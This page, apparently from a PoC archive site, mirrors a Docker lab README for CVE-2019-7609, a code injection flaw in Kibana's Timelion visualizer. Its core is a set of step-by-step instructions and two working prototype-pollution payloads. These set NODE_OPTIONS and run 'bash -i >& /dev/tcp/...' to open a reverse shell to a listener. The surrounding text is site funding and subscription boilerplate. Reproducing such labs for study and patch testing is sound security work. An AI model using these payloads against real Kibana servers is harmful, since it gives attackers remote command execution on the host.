Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%

CVE-2019-7609 PoC — Elasticsearch Kibana 代码注入漏洞

Source
Associated Vulnerability
Title:Elasticsearch Kibana 代码注入漏洞 (CVE-2019-7609)
Description:Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
Description
docker lab setup for kibana-7609
Readme
# CVE-2019-7609

docker lab setup for kibana-7609

Reference : https://github.com/mpgn/CVE-2019-7609


    Open Kibana
    Past one of the following payload into the Timelion visualizer
    Click run
    On the left panel click on Canvas
    Your reverse shell should pop ! :)

    payload by @securityMB

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

    payload by @chybeta

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

File Snapshot

[4.0K] /data/pocs/f93347fe38cb4184034382f299af4660e5af0e60 ├── [ 587] docker-compose.yml └── [ 741] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →